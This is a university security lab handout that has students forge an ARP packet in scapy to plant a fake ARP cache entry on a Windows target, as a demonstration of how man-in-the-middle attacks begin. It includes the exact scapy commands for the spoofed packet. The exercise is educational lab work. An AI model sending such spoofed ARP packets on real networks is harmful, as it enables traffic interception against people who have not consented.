CNIT 123 Project X13: ARP Spoofing with scapy (10 pts.)

What you need

Purpose

We will craft a packet to add a fake cached ARP entry on the target computer. This is how man-in-the-middle attacks work. Understanding how ARP works is essential for network engineers and security professionals.

Start the Windows Machine

Start the Windows machine.

Finding the IP Address of the Windows Machine

On the Windows machine, open a Command Prompt window and execute the IPCONFIG command.

Make a note of your IP address for later reference.

Clearing the ARP Cache on the Windows Machine

On the Windows machine, open a Command Prompt window and execute these commands:

arp -d *

arp -a

This erases the old ARP entries from the cache. You may completely empty the cache, as shown below on this page, or merely reduce it to just a few entries.

Installing scapy on the Linux Machine

If you are using BackTrack 4 R2, scapy is already installed.

If you are using Ubuntu, use this command on the Attacker Linux machine to install it:

sudo apt-get install python-scapy

Sending an ARP from scapy

On the Linux machine, in scapy, enter these commands:
sudo scapy

a = ARP()

a.display()

The attributes of the ARP object named "a" are displayed, as shown below on this page.

On the Linux machine, in scapy, enter these commands.

In the first command, enter the IP address of your Windows target machine.

The MAC and IP addresses in the second and third command are intentionally fake--leave them as they are.

The last MAC address is a broadcast address--leave it as it is.

a.pdst="192.168.198.139"

a.hwsrc="11:11:11:11:11:11"

a.psrc="1.1.1.1"

a.hwdst="ff:ff:ff:ff:ff:ff"

send(a)

The commands are shown in the figure below on this page.

Viewing the ARP Cache on the Windows Machine

On the Windows machine, open a Command Prompt window and execute this command:

arp -a
The fake entry should be visible, with an "Internet Address" of 1.1.1.1 and a "Physical Address" of 11-11-11-11-11-11, as shown below on this page.

Saving the Screen Image

Save a screen image with the filename Proj X13 from Your Name.

Turning in Your Project

Email the image to cnit.123@gmail.com with a Subject line of Proj X13 from Your Name.


Source

http://www.shelltoad.com/coding/arp-spoofing-with-scapy


Last modified: 5-1-12